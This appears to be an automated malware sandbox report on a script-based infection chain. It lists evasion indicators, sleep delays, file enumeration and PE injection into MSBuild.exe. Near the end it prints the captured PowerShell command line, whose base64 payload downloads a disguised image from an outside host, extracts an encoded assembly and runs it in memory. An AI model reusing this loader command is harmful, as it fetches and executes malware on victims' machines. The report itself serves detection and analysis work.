                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Delayed program exit found
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040E54F Sleep,ExitProcess,15_2_0040E54F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_004198C2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5208Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4579Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4897Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4632Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: foregroundWindowGot 1761Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7740Thread sleep count: 193 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7740Thread sleep time: -96500s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep count: 4897 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -14691000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep count: 4632 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744Thread sleep time: -13896000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 8092Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,15_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0044D5E9 FindFirstFileExA,15_2_0044D5E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,15_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,15_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,15_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,15_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00406F06
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: wscript.exe, 0000000D.00000003.2449948318.000001C01F90F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2450277919.000001C01F301000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2450751224.000001C01F701000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2419601586.000001C01F505000.00000004.00000020.00020000.00000000.sdmp, classers.vbs.10.drBinary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
                        Source: classers.vbs.10.drBinary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
                        Source: wscript.exe, 0000000D.00000003.2419750110.000001C01F44D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpnE
                        Source: svchost.exe, 00000012.00000002.3419118443.000002DC6B62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                        Source: wscript.exe, 0000000D.00000003.2449948318.000001C01F90F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2450277919.000001C01F301000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2450751224.000001C01F701000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2419601586.000001C01F505000.00000004.00000020.00020000.00000000.sdmp, classers.vbs.10.drBinary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
                        Source: MSBuild.exe, 0000000F.00000002.3422949413.000000000127B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3420789598.000002DC70C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 0000000D.00000003.2420181162.000001C01F453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2419750110.000001C01F44D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" rt></Analy
                        Source: wscript.exe, 00000000.00000002.2136136823.0000029FFBD1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\z?g
                        Source: wscript.exe, 0000000D.00000003.2420181162.000001C01F453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2419750110.000001C01F44D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iJOpti`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" act
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_15-47845
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00442554 mov eax, dword ptr fs:[00000030h]15_2_00442554
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0044E92E GetProcessHeap,15_2_0044E92E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00434168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00433B44
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00433CD7 SetUnhandledExceptionFilter,15_2_00433CD7

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell decode and execute
                        Source: Yara matchFile source: amsi64_2020.amsi.csv, type: OTHER
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_2020.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2020, type: MEMORYSTR
                        Injects a PE file into a foreign processes
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D65008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_00410F36
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00418754 mouse_event,15_2_00418754
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandledJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
